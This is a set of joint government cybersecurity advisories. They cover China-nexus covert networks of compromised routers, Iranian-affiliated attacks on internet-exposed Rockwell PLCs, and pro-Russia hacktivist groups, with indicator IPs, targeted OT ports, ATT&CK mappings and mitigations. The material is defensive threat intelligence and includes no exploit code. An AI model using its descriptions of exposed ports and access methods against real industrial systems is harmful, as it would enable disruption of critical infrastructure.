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Securing the American Experience

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Defending Against China-Nexus Covert Networks of Compromised Devices

Defending against china-nexus covert networks of compromised devices

executive summary

Defending against China-nexus covert networks of compromised devices 

Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it 

Summary

With support from the UK Cyber League, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners: 

  • Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)
  • Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)
  • Germany Federal Office for the Protection of the Constitution -   Bundesamt für Verfassungsschutz (BfV)
  • Germany Federal Intelligence Service – Bundesnachrichtendienst (BND)
  • Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI)
  • Japan National Cybersecurity Office (NCO) - 国家サイバー統括室
  • Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD)
  • Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD)
  • New Zealand National Cyber Security Centre (NCSC-NZ)
  • Spain National Cryptologic Centre – Centro Criptológico Nacional (CCN)
  • Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE)
  • United States Cybersecurity and Infrastructure Security Agency (CISA)
  • United States Department of Defense Cyber Crime Center (DC3)
  • United States Federal Bureau of Investigation (FBI)
  • United States National Security Agency (NSA) 

Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large scale networks of compromised devices (covert networks) to route their cyber activity. 

Introduction  

Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure, and towards the use of externally provisioned, large-scale networks of compromised devices. 

The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter “covert networks”), that multiple covert networks have been created and are being constantly updated, and that a single covert network could be being used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices. 

Anyone who is a target of China-nexus cyber actors may be impacted by the use of covert networks. They have been used by Chinese state-sponsored actors Volt Typhoon to pre-position offensive cyber capabilities on critical national infrastructure. The group Flax Typhoon used a different covert network of compromised infrastructure to conduct cyber espionage. 

The use of covert networks of compromised devices - also known as botnets - to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically, and at scale.  

This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector.

Covert Networks 

Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their Cyber Kill Chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with said malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs, and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity. 

There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company, Integrity Technology Group. This company was also assessed by the FBI to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon. 

Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks – NCSC Director of Operations, Paul Chichester 

Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon was mainly made up of vulnerable Cisco and NetGear routers. The edge devices were vulnerable because they were “end of life” – out of date and no longer receiving updates or security patches by their manufacturers. 

The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a public blog in May 2024 talking about covert networks in which they highlighted a key issue for defenders – indicator of compromise (IOC) Extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks where new nodes will be added as old devices are patched or removed from use. 

Typical Network Topology

The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network. 

Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date – and for most network defenders would not be practically useful. 

However, most covert networks of compromised devices use the same basic set up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it. 

A diagram illustrating the basic setup of a covert network.
A diagram illustrating the basic setup of a covert network.

The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target. 

Protective Advice 

Defending from attackers using covert networks is not straightforward, and defensive tactics will be different based on the levels of resource and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory.  

The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices. 

Further guidance for all organizations facing cyber security threats is available on the NCSC website. 

This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization’s responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks.

All organizations

The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them: 

  • Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them.
  • Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services.
    • Would you expect connections from consumer broadband ranges?
  • Leverage available dynamic threat feeds which include covert network infrastructure.
  • Implement multifactor authentication for remote connections.

Smaller organizations should consider creating and actioning a free NCSC Cyber Action Toolkit

Larger or more at-risk organizations

Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:  

  • Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers.
  • Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization specific system configuration settings.
  • Implement zero trust policies for connections.
  • Enforce machine certificates for Secure Sockets Layer (SSL) connections.
  • Reduce the internet-facing presence of the IT estate.
  • Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies. 

The NCSC's Cyber Essentials can help protect organizations of all sizes. 

Largest or most at-risk organizations 

If Advanced Persistent Threat (APT) tracking is part of an organization’s in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right.

  • Active hunting – look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices.
  • Track and map covert networks reported by industry or government by looking at banners and certificates.
  • Use threat reporting and threat feeds to create and implement dynamic blocklists and create alert rules to detect incoming threats.
  • Consider using NetFlow feeds to look upstream and map covert networks to find new nodes. 

The NCSC Cyber Assessment Framework provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government.  

MITRE ATT&CK® 

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. 

Tactic 

ID 

Technique 

Procedure 

Resource Development 

Compromise Infrastructure: Botnet 

Botnets are used as core components of covert networks 

Resource Development 

Compromise Infrastructure: Network Devices 

Devices are compromised and added to botnets 

Resource Development 

Acquire Infrastructure: Virtual Private Server 

Virtual private servers (VPS) are used in covert networks, typically as on-ramps 

Command and Control 

Proxy: Multi-hop Proxy 

Used by China-nexus cyber actors to route traffic 

 Appendix: Cyber Security Best Practices 

In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described in this advisory. 

Disclaimer  

This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about NCSC assured services

This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.  

Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.  

All material is UK Crown Copyright © 

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Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure

Advisory at a Glance

Title Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure
Original Publication April 7, 2026
Executive Summary

Iran-affiliated advanced persistent threat (APT) actors are conducting exploitation activity targeting internet-facing operational technology (OT) devices, including programmable logic controllers (PLCs) manufactured by Rockwell Automation/Allen-Bradley. This activity has led to PLC disruptions across several U.S. critical infrastructure sectors through malicious interactions with the project file and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss. 

U.S. organizations should urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section of this advisory to reduce the risk of compromise.

Affected Products
  • Rockwell Automation/Allen-Bradley manufactured PLCs
  • Potentially other branded PLCs
Key Actions
  • Remove PLCs from direct internet exposure via secure gateway and firewall.
  • Query available logs for the provided IOCs in the corresponding time frames.
  • Check available logs for suspicious traffic on the ports associated with OT devices, including 44818, 2222, 102, and 502, especially traffic originating from overseas hosting providers.
  • For Rockwell Automation devices, place the physical mode switch on the controller into run position. Contact the authoring agencies and Rockwell Automation for guidance if you believe your organization was targeted.
Indicators of Compromise

For a downloadable copy of IOCs, see:

Intended Audience

Organizations: Critical Infrastructure

Sectors: Government Services and Facilities, Water and Wastewater Systems (WWS), and Energy 

Roles: Defensive cybersecurity analysts, OT cybersecurity engineers, cybersecurity architects, secure systems developer

Introduction

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), Department of Energy (DOE), and United States Cyber Command – Cyber National Mission Force (CNMF), hereafter referred to as the “authoring agencies,” are urgently warning U.S. organizations of ongoing cyber exploitation of internet-connected operational technology (OT) devices, including Rockwell Automation/Allen-Bradley-manufactured programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors. As a result of this activity, organizations from multiple U.S. critical infrastructure sectors experienced disruptions through malicious interactions with the project files1 and the manipulation of data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays. In a few cases, this activity has resulted in operational disruption and financial loss. 

Due to the widespread use of these PLCs and the potential for additional targeting of other branded OT devices across critical infrastructure, the authoring agencies recommend U.S. organizations urgently review the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the Mitigations section to reduce the risk of compromise.

The authoring agencies assess a group of Iranian-affiliated advanced persistent threat (APT) actors is conducting this activity to cause disruptive effects within the United States. The group has targeted devices spanning multiple U.S. critical infrastructure sectors, including Government Services and Facilities (to include local municipalities), Water and Wastewater Systems (WWS), and Energy Sectors. The authoring agencies previously reported on similar activity targeting PLCs by CyberAv3ngers (aka Shahid Kaveh Group)—a cyber threat actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC). 

If owners and operators discover an affected internet-accessible device in their environment, additional technical measures may be necessary to evaluate the risk of compromise. Please contact the authoring agencies and applicable vendors through existing support channels available to customers and integrators (see Contact Information) to receive support, mitigation, and investigation assistance, and engage your cyber incident response plans.

In addition to contacting the authoring agencies, organizations with Rockwell Automation/Allen-Bradley-manufactured PLCs should review the manufacturer’s previously issued guidance to strengthen the security of their operational technology deployments: PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers, published in 2021, and SD1771 | Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats, published in 2026. Contact the Rockwell Automation Product Security Incident Response Team (PSIRT) at PSIRT@rockwellautomation.com for questions regarding this guidance, or to report cyber incidents related to Rockwell Automation products.

For more information on Iranian malicious cyber activity, see CISA’s Iran Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA26-097A.stix_.xml (XML, 35.97 KB )
AA26-097A.stix_.json (JSON, 11.87 KB )

Background Information

Similar Historical Activity Targeting Programmable Logic Controllers

During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as "CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including WWS. For more information on this group’s activity, see the authoring agencies’ Joint Cybersecurity Advisory IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities.

Ongoing Threat Actor Activity Against U.S.-Based Programmable Logic Controllers

The FBI assesses a group of Iranian-affiliated APT actors are targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations. Iranian-affiliated APT targeting campaigns against U.S. organizations have recently escalated, likely in response to hostilities between Iran, and the United States and Israel. 

Since at least March 2026, the authoring agencies identified (through engagements with victim organizations) an Iranian-affiliated APT-group that disrupted the function of PLCs. These PLCs were deployed across multiple U.S. critical infrastructure sectors (including Government Services and Facilities, WWS, and Energy sectors) within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

The authoring agencies observed Iranian-affiliated APT actors using several overseas-based IP addresses to access internet-facing Rockwell Automation/Allen-Bradley-manufactured PLCs [T0883]. The actors used leased, third-party hosted infrastructure with configuration software, such as Rockwell Automation’s Studio 5000 Logix Designer software, to create an accepted connection to the victim’s PLC. Targeted devices include CompactLogix and Micro850 PLC devices. 

Command and Control

Inbound malicious traffic may be directed to devices on any of following ports: 44818222210222, or 502. The targeting of ports [T0885] associated with other OT vendors’ protocols suggests these actors may also be targeting devices manufactured by companies other than Rockwell Automation/Allen-Bradley, including the Siemens S7 PLC. Additionally, the actors deployed Dropbear Secure Shell (SSH) software on victim endpoints to enable them to gain remote access through port 22 [T1219].

Impact

The FBI identified that this activity resulted in the extraction of the device’s project file and data manipulation on HMI and SCADA displays [T1565].

Indicators of Compromise

See Table 1 for recent IP addresses used by the Iranian-affiliated APT actors to communicate with Rockwell Automation/Allen-Bradley-manufactured devices (and potentially other branded OT devices) in the United States.

Disclaimer: The FBI observed that the threat actors used the IP addresses listed below in the specified time frames. This data is being provided for customers to query against logs for indications of historical targeting by the Iranian-affiliated APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Table 1. Indicators of Compromise
Indicator Beginning of Actor Association End of Actor Association
135.136.1[.]133 March 2026 March 2026
185.82.73[.]162 January 2025 March 2026
185.82.73[.]164 January 2025 March 2026
185.82.73[.]165 January 2025 March 2026
185.82.73[.]167 January 2025 March 2026
185.82.73[.]168 January 2025 March 2026
185.82.73[.]170 January 2025 March 2026
185.82.73[.]171 January 2025 March 2026

MITRE ATT&CK Tactics and Techniques

See Table 2 to Table 4 for all referenced threat actor tactics and techniques in this advisory. The authoring agencies recommend organizations review historical TTPs for similar Iranian-affiliated cyber actor activity in IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 2. Initial Access
Technique Title ID Use
Internet Accessible Device T0883 The actors used Rockwell Automation’s programming software (such as Studio 5000 Logix Designer) to access and interact with publicly exposed, internet-accessible PLCs installed and deployed without sufficient network and/or hardening security controls. 
Table 3. Impact
Technique Title ID Use
Stored Data Manipulation T1565 The actors maliciously interacted with project files and altered data displayed on HMI and SCADA displays
Table 4. Command and Control
Technique Title ID Use
Commonly Used Port T0885 The actors used commonly used OT ports to communicate with PLCs.
Remote Access Tools  T1219 The actors deployed Dropbear SSH software on victim endpoints to enable them to gain remote access through port 22.

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 2.0 (CPGs 2.0) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPG 2.0 webpage for more information on the CPGs, including additional recommended baseline protections.

Network Defenders

The cyber threat actors accessed Rockwell Automation/Allen-Bradley-manufactured PLCs to cause disruptions to victim systems. To safeguard against this threat and threats to other types of PLCs, the authoring agencies urge organizations to consider the following mitigations.

In addition, organizations with these PLCs should view Rockwell Automation’s guidance: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet and Harden PLCs to Protect from Cyber Threats.

Immediate steps to prevent the attack:

  • Disconnect the PLC from the public-facing internet [CPG 3.S]. Follow the joint guidance Secure connectivity principles for OT to safely allow remote access. Specifically, “remove inbound port exposure,” so the OT system is never directly exposed to the internet or external networks, and to ensure all access is mediated, monitored, and controlled. Do this through a secure gateway (jump host) that brokers the connection.
    • Ensure cellular modems, used for remote field connectivity and access, are secured with strong authentication and updated.
    • Enable logs for the connected modems to detect intrusion and improve incident response speed.
  • For controllers with a physical mode switch, place the physical mode switch into run position to prevent remote modification. Devices should only be in the program or remote position when updating or downloading software online and immediately switched back to the run position when complete. (See Rockwell’s2 System Security Design Guidelines for manufacturer’s instructions.)
  • For devices that allow for software key switching, enable programming protection in PLC configuration software (S7 Totally Integrated Automation [TIA] Portal) to limit who can modify PLCs remotely. (See Siemens’ Cybersecurity for Industry Operational Guidelines for the manufacturer’s instructions.)
  • Create and test strong backups of the logic and configurations of PLCs. Store backup files offline and secure the physical removal media to enable fast recovery.

Follow-up steps to strengthen security posture:

  • Implement multifactor authentication (MFA) [CPG 3.F] for access to the OT network from an external network.
  • If remote access is required, implement a network proxy, gateway, firewall, and/or virtual private network (VPN) in front of the PLC to control network access.
    • A VPN or gateway device can enable MFA for remote access even if the PLC does not support MFA. Implement security rules on these higher-level network security mechanisms that prevent the type of repeated and sustained login attempts that would be seen during a brute force attack. When possible, implement a device control list for workstations sending messages or connecting to OT components.
    • Use the device control list to monitor for logon activity for unexpected or unusual access to devices from the internet.
  • Keep PLC devices updated with the latest software patches by the manufacturer. Use established downtime windows to install patches. Known Exploited Vulnerabilities may need to be prioritized outside a downtime window.
  • Configure external and internal firewalls to block traffic using common ports associated with network protocols that are unnecessary for the particular network segment.
  • Disable any unused authentication methods, logic, or features, such as default authentication keys, as well as unused or needed services such as Teletype Network (Telnet), File Transfer Protocol (FTP), Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), and web services.
  • Monitor asset management systems for device configuration changes, which can be used to understand expected parameter settings.
  • Monitor the content of network traffic for the following:
    • Unusual logins to internet-connected devices or unexpected protocols to/from the internet.
    • Functions of industrial control systems (ICS) management protocols that change an asset’s operating mode or modify programs.

In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:

  • Reduce risk exposure. CISA offers a range of services at no cost, including scanning and testing, to help organizations reduce exposure to threats via mitigating attack vectors. CISA’s Cyber Hygiene Services can help provide additional review of organizations’ internet accessible assets. 

Device Manufacturers

Note: The following guidance is general in nature and not specific to any OT vendor. Some of the features, settings, and practices may already be offered by certain vendors. The inclusion of this guidance should not be interpreted as an assertion that vendors referenced in this product do not offer such security features.

Although critical infrastructure organizations using PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default. The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products, primarily:

  • Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.
  • Do not charge additional fees for basic security features needed to operate the product securely.
  • Support MFA, including via phishing-resistant methods.

By using secure by design tactics, software manufacturers can make product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.

For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.

Validate Security Controls

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 2 to Table 4).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

Contact Information

U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:

  • Contact CISA via CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
  • For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.
  • Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact EnergySRMA@hq.doe.gov.
  • Contact the Rockwell Automation PSIRT for questions regarding their guidance or for reporting cyber incidents related to Rockwell Automation at PSIRT@rockwellautomation.com.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

Version History

April 7, 2026: Initial version.

Notes

1Project file refers to the software file that contains ladder logic and configuration settings. On Rockwell Automation devices, it is referred to as an .ACD file.

2 See CompactLogix 5370 Controllers (Chapter 5: "Select the Operating Mode of the Controller") for more information on functions available for the switch.

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Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure

Summary

Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.

FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:

  • U.S. Department of Energy (DOE)
  • U.S. Environmental Protection Agency (EPA)
  • U.S. Department of Defense Cyber Crime Center (DC3)
  • Europol European Cybercrime Centre (EC3)
  • EUROJUST – European Union Agency for Criminal Justice Cooperation
  • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
  • Canadian Centre for Cyber Security (Cyber Centre)
  • Canadian Security Intelligence Service (CSIS)
  • Czech Republic Military Intelligence (VZ)
  • Czech Republic National Cyber and Information Security Agency (NÚKIB)
  • Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)
  • French National Cybercrime Unit – Gendarmerie Nationale (UNC)
  • French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)
  • German Federal Office for Information Security (BSI)
  • Italian State Police (PS)
  • Latvian State Police (VP)
  • Lithuanian Criminal Police Bureau (LKPB)
  • New Zealand National Cyber Security Centre (NCSC-NZ)
  • Romanian National Police (PR)
  • Spanish Civil Guard (GC)
  • Spanish National Police (CNP)
  • Swedish Polisen (SC3)
  • United Kingdom National Cyber Security Centre (NCSC-UK)

The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include Water and Wastewater Systems, Food and Agriculture, and Energy.

The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Threat Overview and Advisories webpage.

Download the PDF version of this report:

Background and Development of Pro-Russia Hacktivist Groups

Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.

Cyber Army of Russia Reborn

The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see Appendix B: Additional Designators Used for Cited Groups)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.

In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine.

CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.

In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms.

The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.

NoName057(16)

The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool DDoSia, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.

Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host DDoSia and share materials and TTPs with their followers. 

In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.

Z-Pentest

Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.

Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.

Sector16

Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives.

Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.

Technical Details

